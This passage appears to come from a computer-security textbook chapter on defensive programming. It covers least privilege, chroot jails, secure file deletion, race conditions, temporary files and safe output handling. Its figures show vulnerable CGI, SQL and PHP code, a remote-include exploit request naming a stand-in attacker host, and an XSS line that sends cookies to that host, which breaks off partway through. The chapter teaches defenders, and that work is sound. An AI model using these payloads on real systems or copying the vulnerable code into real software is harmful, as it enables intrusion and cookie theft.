program is then compromised, the attacker then has greater scope for modifying and

corrupting the system. This violates the principle of least privilege. A very common

example of this poor practice is seen in the configuration of many Web servers and

their document directories. On most systems the Web server runs with the privilege

of a special user, commonly www or similar. Generally the Web server only needs

the ability to read files it is serving. The only files it needs write access to are those

used to store information provided by CGI scripts, file uploads, and the like. All

other files should have write access to the group of users managing them, but not

the Web server. However, common practice by system managers with insufficient

security awareness is to assign the ownership of most files in the Web document

hierarchy to the Web server. Consequently, should the Web server be compromised,

the attacker can then change most of the files. The widespread occurrence of Web

defacement attacks is a direct consequence of this practice. The server is typically

compromised by an attack like the PHP remote code injection attack we discuss in

Section 11.2 . This allows the attacker to run any PHP code of their choice with the

privileges of the Web server. The attacker may then replace any pages the server has

write access to. The result is almost certain embarrassment for the organization. If

the attacker accesses or modifies form data saved by previous CGI script users, then

more serious consequences can result.

Care is needed to assign the correct file and group ownerships to files and

directories managed by privileged programs. Problems can manifest particularly

when a program is moved from one computer system to another or when there

is a major upgrade of the operating system. The new system might use different

defaults for such users and groups. If all affected programs, files, and directories are

not correctly updated, then either the service will fail to function as desired or worse

may have access to files it should not, which may result in corruption of files. Again

this may be seen in moving a Web server to a newer, different system, where the

Web server user might change from www to www-data. The affected files may not

just be those in the main Web server document hierarchy but may also include files

in users’ public Web directories.

Privilege escalation

Exploit of flaws may give attacker greater privileges

Least privilege

Run programs with least privilege needed to complete their function

Determine appropriate user and group privileges required

Decide whether to grant extra user or just group privileges

Ensure that privileged program can modify only those files and directories necessary

Root/Administrator Privileges

35

The greatest concerns with privileged programs occur when such programs

execute with root or administrator privileges. These provide very high levels of

access and control to the system. Acquiring such privileges is typically the major

goal of an attacker on any system. Hence any such privileged program is a key

target. The principle of least privilege indicates that such access should be granted

as rarely and as briefly as possible. Unfortunately, due to the design of operating

systems and the need to restrict access to underlying system resources, there are

circumstances when such access must be granted. Classic examples include the

programs used to allow a user to log in or to change passwords on a system; such programs must access and update files restricted to the root user. Another common example is network

servers that need to bind to a privileged service port. These include Web, Secure

Shell (SSH), SMTP mail delivery, DNS, and many other servers. Traditionally, such

server programs executed with root privileges for the entire time they were running.

Closer inspection of the privilege requirements reveals that they only need

root privileges to initially bind to the desired privileged port. Once this is done

the server programs could reduce their user privileges to those of another special

system user. Any subsequent attack is then much less significant. The problems

resulting from the numerous security bugs in the once widely used sendmail mail

delivery program are a direct consequence of it being a large, complex monolithic

program that ran continuously as the root user.
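A minimal C sketch of this pattern (the port and the numeric uid/gid are illustrative; a real server would look the user up with getpwnam()):

#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void)
{
    int s = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in addr;

    memset(&addr, 0, sizeof addr);
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    addr.sin_port = htons(80);              /* binding here requires root */

    if (s < 0 || bind(s, (struct sockaddr *)&addr, sizeof addr) < 0) {
        perror("bind");
        return 1;
    }

    /* Root is no longer needed: drop the group first, then the user. */
    if (setgid(33) != 0 || setuid(33) != 0) {   /* e.g., www-data */
        perror("drop privileges");
        return 1;
    }

    listen(s, 16);
    /* ... all subsequent requests are served unprivileged ... */
    return 0;
}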

We now recognize that good defensive program design requires that large,

complex programs be partitioned into smaller modules, each granted the privileges

they require, only for as long as they need them. This form of program modularization

provides a greater degree of isolation between the components, reducing the

consequences of a security breach in one component. In addition, being smaller,

each component module is easier to test and verify. Ideally the few components that

require elevated privileges can be kept small and subject to much greater scrutiny

than the remainder of the program. The popularity of the postfix mail delivery

program, now widely replacing the use of sendmail in many organizations, is

partly due to its adoption of these more secure design guidelines.

 A further technique to minimize privilege is to run potentially vulnerable

programs in some form of sandbox that provides greater isolation and control of

the executing program from the wider system. The runtime for code written in languages

such as Java includes this type of functionality. Alternatively, UNIX-related

systems provide the chroot  system function to limit a program’s view of the file

system to just one carefully configured and isolated section of the file system. This

is known as a chroot jail. Provided this is configured correctly, even if the program

is compromised, it may only access or modify files in the chroot jail section of the

file system. Unfortunately, correct configuration of a chroot jail is difficult. If created

incorrectly, the program may either fail to run correctly or, worse, may still be able

to interact with files outside the jail. While the use of a chroot jail can significantly

limit the consequences of compromise, it is not suitable for all circumstances, nor is it a complete security solution. A further, more recently developed alternative for

this is the use of containers, also known as application virtualization, which we will

discuss in Section 12.8.
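A minimal C sketch of entering a chroot jail (the jail path and uid/gid are illustrative). Note that privileges must be dropped as well, since a process that remains root inside a jail may be able to escape it:

#include <stdio.h>
#include <unistd.h>

int main(void)
{
    if (chroot("/var/jail/myapp") != 0 || chdir("/") != 0) {
        perror("chroot");
        return 1;
    }
    /* Drop root before doing any real work inside the jail. */
    if (setgid(1001) != 0 || setuid(1001) != 0) {
        perror("drop privileges");
        return 1;
    }
    /* From here on, "/" refers to /var/jail/myapp on the real system. */
    return 0;
}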

Programs with root/administrator privileges are a major target of attackers

They provide highest levels of system access and control

Are needed to manage access to protected system resources

Often privilege is only needed at start

Can then run as normal user

Good design partitions complex programs into smaller modules with needed privileges

Provides a greater degree of isolation between the components

Reduces the consequences of a security breach in one component

Easier to test and verify

System Calls and Standard Library Functions

36

Except on very small, embedded systems, no computer program contains all of

the code it needs to execute. Rather, programs make calls to the operating system

to access the system’s resources and to standard library functions to perform

common operations. When using such functions, programmers commonly make

assumptions about how they actually operate. Most of the time they do indeed

seem to perform as expected. However, there are circumstances when the assumptions

a programmer makes about these functions are not correct. The result can

be that the program does not perform as expected. Part of the reason for this is

that programmers tend to focus on the particular program they are developing and

view it in isolation. However, on most systems this program will simply be one of

many running and sharing the available system resources. The operating system

and library functions attempt to manage their resources in a manner that provides

the best performance to all the programs running on the system. This does

result in requests for services being buffered, resequenced, or otherwise modified

to optimize system use. Unfortunately, there are times when these optimizations

conflict with the goals of the program. Unless the programmer is aware of these

interactions and explicitly codes for them, the resulting program may not perform

as expected.

Programs use system calls and standard library functions for common operations

Programmers make assumptions about their operation

If incorrect, behavior is not what is expected

May be a result of system optimizing access to shared resources

Results in requests for services being buffered, resequenced, or otherwise modified to optimize system use

Optimizations can conflict with program goals

37

An excellent illustration of these issues is given by Venema in his discussion

of the design of a secure file shredding program [VENE06]. The problem is how

to securely delete a file so that its contents cannot subsequently be recovered. Just

using the standard file delete utility or system call does not suffice, as this simply

removes the linkage between the file’s name and its contents. The contents still

exist on the disk until those blocks are eventually reused in another file. Reversing

this operation is relatively straightforward, and undelete programs have existed

for many years to do this. Even when blocks from a deleted file are reused, the

data in the files can still be recovered because not all traces of the previous bit

values are removed [GUTM96]. Consequently, the standard recommendation is

to repeatedly overwrite the data contents with several distinct bit patterns to minimize

the likelihood of the original data being recovered. Hence a secure file shredding

program might perhaps implement an algorithm like that shown in Figure 11.7a. However, when an obvious implementation of this algorithm was tried, the

file contents were still recoverable afterwards. Venema details a number of flaws

in this algorithm that mean the program does not behave as expected. These flaws

relate to incorrect assumptions about how the relevant system functions operate

and include the following:

• When the file is opened for writing, the system will write the new data to the same disk blocks as the original data. In practice, the operating system may

well assume that the existing data are no longer required, remove them from

association with the file, and then allocate new unused blocks to write the data

to. What the program should do is open the file for update, indicating to the

operating system that the existing data are still required.

• When the file is overwritten with a pattern, the data are written immediately

to disk. In the first instance the data are copied into a buffer in the application,

managed by the standard library file I/O routines. These routines delay

writing this buffer until it is sufficiently full, the program flushes the buffer,

or the file is closed. If the file is relatively small, this buffer may never fill up

before the program loops round, seeks back to the start of the file, and writes

the next pattern. In such a case the library code will decide that because the

previously written data have changed, there is no need to write the data to

disk. The program needs to explicitly insist that the buffer be flushed after

each pattern is written.

• When the I/O buffers are flushed and the file is closed, the data are then written

to disk. However, there is another layer of buffering in the operating system’s

file handling code. This layer buffers information being read from and written

to files by all of the processes currently running on the computer system. It

then reorders and schedules these data for reading and writing to make the

most efficient use of physical device accesses. Even if the program flushes the

data out of the application buffer into the file system buffer, the data will not

be immediately written. If new replacement data are flushed from the program,

again they will most likely replace the previous data and not be written to disk,

because the file system code will assume that the earlier values are no longer

required. The program must insist that the file system synchronize the data

with the values on the device in order to ensure that the data are physically

transferred to the device. However, doing this results in a performance penalty

on the system because it forces device accesses to occur at less than optimal

times. This penalty impacts not just this file shredding program but every

program currently running on the system.

With these changes, the algorithm for a secure file shredding program changes

to that shown in Figure 11.7b . This is certainly more likely to achieve the desired

result; however, examined more closely, there are yet more concerns.
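Before turning to those concerns, a minimal C sketch of the corrected overwrite loop (illustrative only; the textbook's Figure 11.7b is the authoritative version) makes the required flushing explicit:

#include <stdio.h>
#include <unistd.h>

int shred(const char *path, long size)
{
    static const unsigned char patterns[] = { 0x00, 0xFF, 0xAA };
    FILE *f = fopen(path, "r+b");   /* update mode: keep the existing blocks */
    if (f == NULL)
        return -1;

    for (size_t i = 0; i < sizeof patterns; i++) {
        fseek(f, 0L, SEEK_SET);
        for (long n = 0; n < size; n++)
            fputc(patterns[i], f);
        fflush(f);                  /* application buffer -> file system */
        fsync(fileno(f));           /* file system buffers -> device */
    }
    fclose(f);
    return 0;
}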

Modern disk drives and other storage devices are managed by smart controllers,

which are dedicated processors with their own memory. When the operating

system transfers data to such a device, the data are stored in buffers in the controller’s

memory. The controller also attempts to optimize the sequence of transfers

to the actual device. If it detects that the same data block is being written multiple

times, the controller may discard the earlier data values. To prevent this the program

needs some way to command the controller to write all pending data. Unfortunately,

there is no standard mechanism on most operating systems to make such a request.

When Apple was developing its Mac OS secure file delete program, it found it

necessary to create an additional file control option to generate this command. And

its use incurs a further performance penalty on the system. But there are still more

problems. If the device is a nonmagnetic disk (e.g., a flash memory drive), then its controller tries to minimize the number of writes to any block, because such devices only support a limited number of rewrites to any block. It may therefore allocate new blocks when data are rewritten rather than reusing the existing block. Also, some types of journaling file systems keep records of all changes made

to files to enable fast recovery after a disk crash. But these records can be used to

access previous data contents.

All of this indicates that writing a secure file shredding program is actually

an extremely difficult exercise. There are so many layers of code involved, each of

which makes assumptions about what the program really requires in order to provide

the best performance. When these assumptions conflict with the actual goals

of the program, the result is that the program fails to perform as expected. A secure

programmer needs to identify such assumptions and resolve any conflicts with the

program goals. Because identifying all relevant assumptions may be very difficult,

it also means exhaustively testing the program to ensure that it does indeed behave

as expected. When it does not, the reasons should be determined and the invalid

assumptions identified and corrected.

Venema concludes his discussion by noting that in fact the program may actually

be solving the wrong problem. Rather than trying to destroy the file contents

before deletion, a better approach may in fact be to overwrite all currently unused

blocks in the file systems and swap space, including those recently released from

deleted files.

Preventing Race Conditions

Programs may need to access a common system resource

Need suitable synchronization mechanisms

Most common technique is to acquire a lock on the shared file

Lockfile

Process must create and own the lockfile in order to gain access to the shared resource

Concerns

If a program chooses to ignore the existence of the lockfile and access the shared resource, the system will not prevent this

All programs using this form of synchronization must cooperate

Implementation

38

There are circumstances in which multiple programs need to access a common

system resource, often a file containing data created and manipulated by multiple

programs. Examples include mail client and mail delivery programs sharing access

to a user’s mailbox file, or various users of a Web CGI script updating the same

file used to save submitted form values. This is a variant of the issue, discussed in

Section 11.3 —synchronizing access to shared memory. As in that case, the solution

is to use an appropriate synchronization mechanism to serialize the accesses

to prevent errors. The most common technique is to acquire a lock on the shared

file, ensuring that each process has appropriate access in turn. There are several

methods used for this, depending on the operating system in use.

The oldest and most general technique is to use a lockfile . A process must

create and own the lockfile in order to gain access to the shared resource. Any other

process that detects the existence of a lockfile must wait until it is removed before

creating its own to gain access. There are several concerns with this approach. First,

it is purely advisory. If a program chooses to ignore the existence of the lockfile

and access the shared resource, then the system will not prevent this. All programs

using this form of synchronization must cooperate. A more serious flaw occurs in

the implementation. The obvious implementation is first to check that the lockfile

does not exist and then create it. Unfortunately, this contains a fatal deficiency.

Consider two processes each attempting to check and create this lockfile. The first

checks and determines that the lockfile does not exist. However, before it is able

to create the lockfile, the system suspends the process to allow other processes to

run. At this point the second process also checks that the lockfile does not exist,

creates it, and proceeds to start using the shared resource. Then it is suspended and

control returns to the first process, which proceeds to also create the lockfile and

access the shared resource at the same time. The data in the shared file will then

likely be corrupted. This is a classic illustration of a race condition. The problem is that checking that the lockfile does not exist and then creating it must be executed together, without the possibility of interruption. This is known as an atomic operation. The correct implementation in this case is not to test separately for the presence of the lockfile, but always to attempt to create it. The specific options used in the file create call specify that if the file already exists, then

the attempt must fail and return a suitable error code. If it fails, the process waits

for a period and then tries again until it succeeds. The operating system implements

this function as an atomic operation, providing guaranteed controlled access to the

resource. While the use of a lockfile is a classic technique, it has the advantage that

the presence of a lock is quite clear because the lockfile is seen in a directory listing.

It also allows the administrator to easily remove a lock left by a program that either

crashed or otherwise failed to remove the lock.
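A minimal C sketch of this atomic create-or-fail approach (the lockfile path is supplied by the caller; the retry interval is illustrative):

#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

int acquire_lock(const char *lockpath)
{
    for (;;) {
        /* Test-and-create in one atomic system call. */
        int fd = open(lockpath, O_CREAT | O_EXCL | O_WRONLY, 0600);
        if (fd >= 0)
            return fd;      /* we now own the lock */
        if (errno != EEXIST)
            return -1;      /* unexpected failure */
        sleep(1);           /* lock held elsewhere: wait and retry */
    }
}

void release_lock(const char *lockpath, int fd)
{
    close(fd);
    unlink(lockpath);       /* remove the lockfile so others may proceed */
}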

There are more modern and alternative locking mechanisms available for files.

These may also be advisory and can also be mandatory, where the operating system

guarantees that a locked file cannot be accessed inappropriately. The issue with

mandatory locks is the mechanisms for removing them should the locking process

crash or otherwise not release the lock. These mechanisms are also implemented

differently on different operating systems. Hence care is needed to ensure that the

chosen mechanism is used correctly.

Figure 11.8 illustrates the use of the advisory flock call in a Perl script. This might typically be used in a Web CGI form handler to append information provided by a user to a shared file. Subsequently another program, also using this locking mechanism,

could access the file and process and remove these details. Note that there

are subtle complexities related to locking files using different types of read or write

access. Suitable program or function references should be consulted on the correct

use of these features.

39

Safe Temporary Files

Many programs use temporary files

Often in common, shared system area

Must be unique, not accessed by others

Commonly create name using process ID

Unique, but predictable

Attacker might guess and attempt to create own file between program checking and creating

Secure temporary file creation and use requires the use of random names

40

Many programs need to store a temporary copy of data while they are processing the

data. A temporary file is commonly used for this purpose. Most operating systems

provide well-known locations for placing temporary files and standard functions for

naming and creating them. The critical issue with temporary files is that they are

unique and not accessed by other processes. In a sense this is the opposite problem

to managing access to a shared file. The most common technique for constructing

a temporary filename is to include a value such as the process identifier. As each

process has its own distinct identifier, this should guarantee a unique name. The

program generally checks to ensure that the file does not already exist, perhaps left

over from a crash of a previous program, and then creates the file. This approach

suffices from the perspective of reliability but not with respect to security.

Again the problem is that an attacker does not play by the rules. The attacker

could attempt to guess the temporary filename a privileged program will use.

The attacker then attempts to create a file with that name in the interval between

the program checking the file does not exist and subsequently creating it. This is

another example of a race condition, very similar to that when two processes race to

access a shared file when locks are not used. There is a famous example, reported

in [WHEE03], of some versions of the tripwire file integrity program suffering

from this bug. The attacker would write a script that made repeated guesses on the

temporary filename used and create a symbolic link from that name to the password

file. Access to the password file was restricted, so the attacker could not write to it.

However, the tripwire program runs with root privileges, giving it access to all files

on the system. If the attacker succeeds, then tripwire will follow the link and use

the password file as its temporary file, destroying all user login details and denying

access to the system until the administrators can replace the password file with a

backup copy. This was a very effective and inconvenient denial of service attack on

the targeted system. This illustrates the importance of securely managing temporary

file creation.

Secure temporary file creation and use preferably requires the use of a random

temporary filename. The creation of this file should be done using an atomic system

primitive, as is done with the creation of a lockfile. This prevents the race condition

and hence the potential exploit of this file. The standard C function mkstemp() is

suitable; however, the older functions tmpfile(), tmpnam(), and tempnam() are all

insecure unless used with care. It is also important that the minimum access is given

to this file. In most cases only the effective owner of the program creating this file

should have any access.

The GNOME Programming Guidelines recommend using

the C code shown in Figure 11.9 to create a temporary file in a shared directory on

Linux and UNIX systems. Although this code calls the insecure tempnam() function,

it uses a loop with appropriately restrictive file creation flags to counter its security

deficiencies. Once the program has finished using the file, it must be closed and

unlinked. Perl programmers can use the File::Temp module for secure temporary file

creation. Programmers using other languages should consult appropriate references

for suitable methods.
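As a further illustration, a minimal C sketch using mkstemp() (the directory and name prefix are illustrative):

#include <stdlib.h>
#include <unistd.h>

int make_temp(void)
{
    char name[] = "/tmp/myapp-XXXXXX";  /* mkstemp() replaces the Xs */
    int fd = mkstemp(name);             /* atomic create, owner-only access */
    if (fd < 0)
        return -1;
    unlink(name);   /* the file persists until fd is closed, but no
                       longer has a name an attacker can target */
    return fd;
}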

When the file is created in a shared temporary directory, the access permissions

should specify that only the owner of the temporary file, or the system administrators,

should be able to remove it. This is not always the default permission setting,

which must be corrected to enable secure use of such files. On Linux and UNIX

systems this requires setting the sticky permission bit on the temporary directory, as

we discuss in Sections 4.4 and 25.3 .

41

Other Program Interaction

42

As well as using functionality provided by the operating system and standard

library functions, programs may also use functionality and services provided

by other programs. Unless care is taken with this interaction, failure to identify

assumptions about the size and interpretation of data flowing among different

programs can result in security vulnerabilities. We discuss a number of issues

related to managing program input in Section 11.2 and program output in Section 11.5 .

The flow of information between programs can be viewed as output from one

forming input to the other. Such issues are of particular concern when the program

being used was not originally written with this wider use as a design issue

and hence did not adequately identify all the security concerns that might arise.

This occurs particularly with the current trend of providing Web interfaces to

programs that users previously ran directly on the server system. While ideally all

programs should be designed to manage security concerns and be written defensively,

this is not the case in reality. Hence the burden falls on the newer programs,

utilizing these older programs, to identify and manage any security issues

that may arise.

A further concern relates to protecting the confidentiality and integrity of

the data flowing among various programs. When these programs are running on

the same computer system, appropriate use of system functionality such as pipes

or temporary files provides this protection. If the programs run on different systems,

linked by a suitable network connection, then appropriate security mechanisms

should be employed by these network connections. Alternatives include the

use of IP Security (IPsec), Transport Layer Security/Secure Sockets Layer (TLS/SSL), or Secure Shell (SSH) connections. Even when using well-regarded, standardized protocols, care is

needed to ensure they use strong cryptography, as weaknesses have been found in a

number of algorithms and their implementations [SIMP11]. We discuss some of these alternatives in

Chapter 22 .

Suitable detection and handling of exceptions and errors generated by program

interaction is also important from a security perspective. When one process invokes

another program as a child process, it should ensure that the program terminates

correctly and accept its exit status. It must also catch and process signals resulting

from interaction with other programs and the operating system.
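A minimal sketch of this pattern, assuming a POSIX system (the command run by the child is illustrative): the parent ignores SIGPIPE so a broken pipe is reported as an error rather than killing the process, waits for the child, and checks how it terminated.

#include <signal.h>
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    /* ignore SIGPIPE so writing to a dead child yields an error
       return we can check, rather than terminating this process */
    signal(SIGPIPE, SIG_IGN);

    pid_t pid = fork();
    if (pid == -1) {
        perror("fork");
        return 1;
    }
    if (pid == 0) {                        /* child process */
        execl("/bin/ls", "ls", "-l", (char *)NULL);
        _exit(127);                        /* exec failed */
    }

    int status;                            /* parent: accept exit status */
    if (waitpid(pid, &status, 0) == -1) {
        perror("waitpid");
        return 1;
    }
    if (WIFEXITED(status) && WEXITSTATUS(status) == 0)
        printf("child terminated correctly\n");
    else
        fprintf(stderr, "child failed or was killed by a signal\n");
    return 0;
}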

Programs may use functionality and services of other programs

Security vulnerabilities can result unless care is taken with this interaction

Such issues are of particular concern when the program being used did not adequately identify all the security concerns that might arise

Occurs with the current trend of providing Web interfaces to programs

Burden falls on the newer programs to identify and manage any security issues that may arise

Issue of data confidentiality/integrity

Detection and handling of exceptions and errors generated by interaction is also important from a security perspective

Handling Program Output

Final component is program output

May be stored for future use, sent over net, displayed

May be binary or text

Important from a program security perspective that the output conform to the expected form and interpretation

Programs must identify what is permissible output content and filter any possibly untrusted data to ensure that only valid output is displayed

Character set should be specified

43

The final component of our model of computer programs is the generation of output

as a result of the processing of input and other interactions. This output might be

stored for future use (e.g., in files or a database), or be transmitted over

a network connection, or be destined for display to some user. As with program

input, the output data may be classified as binary or textual. Binary data may encode complex structures, such as requests to an X Window System display to create and manipulate graphical interface components, or complex binary network protocol structures. Textual data will be encoded using some character set and may represent structured output, such as HTML.

In all cases it is important from a program security perspective that the output

really does conform to the expected form and interpretation. If directed to a user,

it will be interpreted and displayed by some appropriate program or device. If this

output includes unexpected content, then anomalous behavior may result, with

detrimental effects on the user. A critical issue here is the assumption of common

origin. If a user is interacting with a program, the assumption is that all output seen

was created by, or at least validated by, that program. However, as the discussion

of cross-site scripting (XSS) attacks in Section 11.2 illustrates, this assumption may

not be valid. A program may accept input from one user, save it, and subsequently

display it to another user. If this input contains content that alters the behavior of

the program or device displaying the data, and the content is not adequately sanitized

by the program, then an attack on the user is possible.

Consider two examples. The first involves simple text-based programs run

on classic time-sharing systems when purely textual terminals, such as the VT100,

were used to interact with the system. Such terminals often supported a set of

function keys, which could be programmed to send any desired sequence of characters

when pressed. This programming was implemented by sending a special escape

sequence. The terminal would recognize these sequences and, rather than displaying

the characters on the screen, would perform the requested action. In addition

to programming the function keys, other escape sequences were used to control

formatting of the textual output (bold, underline, etc.), to change the current cursor

location, and critically to specify that the current contents of a function key should

be sent, as if the user had just pressed the key. Together these capabilities could be

used to implement a classic command injection attack on a user, which was a favorite

student prank in previous years. The attacker would get the victim to display some

carefully crafted text on his or her terminal. This could be achieved by convincing

the victim to run a program, have it included in an e-mail message, or have it written

directly to the victim’s terminal if the victim permitted this. While displaying some

innocent message to distract the targeted user, this text would also include a number

of escape sequences that first programmed a function key to send some selected

command and then the command to send that text as if the programmed function

key had been pressed. If the text was displayed by a program that subsequently

exited, then the text sent from the programmed function key would be treated as

if the targeted user had typed it as his or her next command. Hence the attacker

could make the system perform any desired operation the user was permitted to

do. This could include deleting the user’s files or changing the user’s password. With

this simple form of attack, the user would see the commands and the response being

displayed and know it had occurred, though too late to prevent it. With more subtle

combinations of escape sequences, it was possible to capture and prevent this text

from being displayed, hiding the fact of the attack from direct observation by the

user until its consequences became obvious. A more modern variant of this attack

exploits the capabilities of an insufficiently protected X-terminal display to similarly

hijack and control one or more of the user’s sessions.

The key lesson illustrated by this example concerns the user’s expectations

of the type of output that would be sent to the user’s terminal display. The user

expected the output to be primarily pure text for display. If a program such as a

text editor or mail client used formatted text or the programmable function keys,

then it was trusted not to abuse these capabilities. Indeed, most such programs encountered by users did respect these conventions. Programs like a mail

client, which displayed data originating from other users, needed to filter such text

to ensure that any escape sequences included in them were disabled. The issue for

users then was to identify other programs that could not be so trusted, and if necessary

filter their output to foil any such attack. Another lesson seen here, and even

more so in the subsequent X-terminal variant of this attack, was to ensure that

untrusted sources were not permitted to direct output to a user’s display. In the case

of traditional terminals, this meant disabling the ability of other users to write messages

directly to the user’s display. In the case of X-terminals, it meant configuring

the authentication mechanisms so that only programs run at the user’s command

were permitted to access the user’s display.
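A minimal sketch of such output filtering, assuming ASCII text destined for a terminal (the replacement character is a design choice): only printable characters, newline, and tab are passed through, so ESC (0x1B) and the other control characters that could reprogram function keys are neutralized.

#include <ctype.h>
#include <stdio.h>

/* copy untrusted text to the terminal, passing only printable
   characters plus newline and tab; filtered control characters
   are replaced with '?' to make their presence visible */
static void safe_puts(const char *s, FILE *out)
{
    for (; *s; s++) {
        unsigned char c = (unsigned char)*s;
        if (isprint(c) || c == '\n' || c == '\t')
            fputc(c, out);
        else
            fputc('?', out);
    }
}

int main(void)
{
    safe_puts("innocent text\x1b[2J\n", stdout);  /* escape sequence defanged */
    return 0;
}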

The second example is the classic cross-site scripting (XSS) attack using a

guestbook on some Web server. If the guestbook application fails to adequately check and sanitize input supplied by one user, that input can be used to implement

an attack on users subsequently viewing these comments. This attack exploits

the assumptions and security models used by Web browsers when viewing content

from a site. Browsers assume all of the content was generated by that site and is

equally trusted. This allows programmable content like JavaScript to access and

manipulate data and metadata on the client side, such as cookies associated with

that site. The issue here is that not all data were generated by, or under the control

of, that site. Rather the data came from some other, untrusted user.

Any programs that gather and rely on third-party data have to be responsible

for ensuring that any subsequent use of such data is safe and does not violate

the user’s assumptions. These programs must identify what is permissible output

content and filter any possibly untrusted data to ensure that only valid output is

displayed. The simplest filtering alternative is to remove all HTML markup. This

will certainly make the output safe but can conflict with the desire to allow some

formatting of the output. The alternative is to allow just some safe markup through.

As with input filtering, the focus should be on allowing only what is safe rather than

trying to remove what is dangerous, as the interpretation of what counts as dangerous may well change over time.
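A minimal sketch of the remove-all-markup alternative in C, assuming untrusted text is being embedded in an HTML page (the entity choices follow common practice): the HTML metacharacters are encoded so the browser displays them as text rather than interpreting them.

#include <stdio.h>

/* emit untrusted text into an HTML page with metacharacters encoded
   as entities, so embedded markup such as <script> is displayed,
   not executed, by the browser */
static void html_escape(const char *s, FILE *out)
{
    for (; *s; s++) {
        switch (*s) {
        case '&':  fputs("&amp;", out);  break;
        case '<':  fputs("&lt;", out);   break;
        case '>':  fputs("&gt;", out);   break;
        case '"':  fputs("&quot;", out); break;
        case '\'': fputs("&#39;", out);  break;
        default:   fputc(*s, out);
        }
    }
}

int main(void)
{
    html_escape("<script>alert('xss')</script>", stdout);
    putchar('\n');
    return 0;
}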

Another issue here is that different character sets allow different encodings of

meta characters, which may change the interpretation of what is valid output. If the

display program or device is unaware of the specific encoding used, it might make a different assumption than the program does, possibly subverting the filtering. Hence it is important for the program either to specify the encoding explicitly where possible, or otherwise to ensure that the encoding conforms to the display's expectations. This is the obverse of the issue of input canonicalization, where the program ensures that it has a common, minimal representation of the input to validate. In the case of Web

output, it is possible for a Web server to specify explicitly the character set used in

the Content-Type HTTP response header. Unfortunately, this is not specified as

often as it should be. If not specified, browsers will make an assumption about the

default character set to use. This assumption is not clearly codified; hence different

browsers can and do make different choices. If Web output is being filtered, the

character set should be specified.
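A minimal sketch for a CGI-style program, assuming HTML output (the body line is illustrative): the character set is declared explicitly in the Content-Type header before any filtered output is emitted.

#include <stdio.h>

int main(void)
{
    /* declare the character set explicitly so the browser cannot
       guess a different encoding and so bypass the output filtering */
    printf("Content-Type: text/html; charset=UTF-8\r\n\r\n");
    printf("<html><body>... filtered output ...</body></html>\n");
    return 0;
}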

Note that in these examples of security flaws that result from program output,

the target of compromise was not the program generating the output but

rather the program or device used to display the output. It could be argued that

this is not the concern of the programmer, as their program is not subverted.

However, if the program acts as a conduit for attack, the programmer’s reputation

will be tarnished, and users may well be less willing to use the program. In the case

of XSS attacks, a number of well-known sites were implicated in these attacks and

suffered adverse publicity.

Summary

Software security issues

Introducing software security and defensive programming

Handling program input

Input size and buffer overflow

Interpretation of program input

Validating input syntax

Input fuzzing

Writing safe program code

Correct algorithm implementation

Ensuring that machine language corresponds to algorithm

Correct interpretation of data values

Correct use of memory

Preventing race conditions with shared memory

Interacting with the operating system and other programs

Environment variables

Using appropriate, least privileges

System calls and standard library functions

Preventing race conditions with shared system resources

Safe temporary file use

Interacting with other programs

Handling program output

44

Chapter 11 summary.

Software Error Category: Insecure Interaction Between Components

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Unrestricted Upload of File with Dangerous Type

Cross-Site Request Forgery (CSRF)

URL Redirection to Untrusted Site ('Open Redirect')

Software Error Category: Risky Resource Management

Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Download of Code Without Integrity Check

Inclusion of Functionality from Untrusted Control Sphere

Use of Potentially Dangerous Function

Incorrect Calculation of Buffer Size

Uncontrolled Format String

Integer Overflow or Wraparound

Software Error Category: Porous Defenses

Missing Authentication for Critical Function

Missing Authorization

Use of Hard-coded Credentials

Missing Encryption of Sensitive Data

Reliance on Untrusted Inputs in a Security Decision

Execution with Unnecessary Privileges

Incorrect Authorization

Incorrect Permission Assignment for Critical Resource

Use of a Broken or Risky Cryptographic Algorithm

Improper Restriction of Excessive Authentication Attempts

Use of a One-Way Hash without a Salt

Figure 11.1 Abstract View of Program (diagram: a program, executing its algorithm, processing input data, and generating output, interacts with the operating system, file system, network link, database via a DBMS, and other programs on the computer system's machine hardware, with input from keyboard & mouse and output to a GUI display)



1 #!/usr/bin/perl

2 # finger.cgi - finger CGI script using Perl5 CGI module

3

4 use CGI;

5 use CGI::Carp qw(fatalsToBrowser);

6 $q = new CGI; # create query object

7

8 # display HTML header

9 print $q->header,

10 $q->start_html('Finger User'),

11 $q->h1('Finger User');

12 print "<pre>";

13

14 # get name of user and display their finger details

15 $user = $q->param("user");

16 print `/usr/bin/finger -sh $user`;

17

18 # display HTML footer

19 print "</pre>";

20 print $q->end_html;

(a) Unsafe Perl finger CGI script

<html><head><title>Finger User</title></head><body>

<h1>Finger User</h1>

<form method=post action="finger.cgi">

<b>Username to finger</b>: <input type=text name=user value="">

<p><input type=submit value="Finger User">

</form></body></html>

(b) Finger form

Finger User

Login Name TTY Idle Login Time Where

lpb Lawrie Brown p0 Sat 15:24 ppp41.grapevine

Finger User

attack success

-rwxr-xr-x 1 lpb staff 537 Oct 21 16:19 finger.cgi

-rw-r--r-- 1 lpb staff 251 Oct 21 16:14 finger.html

(c) Expected and subverted finger CGI responses

14 # get name of user and display their finger details

15 $user = $q->param("user");

16 die "The specified user contains illegal characters!"

17 unless ($user =~ /^\w+$/);

18 print `/usr/bin/finger -sh $user`;

(d) Safety extension to Perl finger CGI script

Figure 11.2 A Web CGI Injection Attack


$name = $_REQUEST['name'];

$query = "SELECT * FROM suppliers WHERE name = '" . $name . "';";

$result = mysql_query($query);

(a) Vulnerable PHP code

$name = $_REQUEST['name'];

$query = "SELECT * FROM suppliers WHERE name = '" .

mysql_real_escape_string($name) . "';";

$result = mysql_query($query);

(b) Safer PHP code

Figure 11.3 SQL Injection Example


<?php

include $path . 'functions.php';

include $path . 'data/prefs.php';

…

(a) Vulnerable PHP code

GET /calendar/embed/day.php?path=http://hacker.web.site/hack.txt?&cmd=ls

(b) HTTP exploit request

Figure 11.4 PHP Code Injection Example


Thanks for this information, its great!

<script>document.location='http://hacker.web.site/cookie.cgi?'+

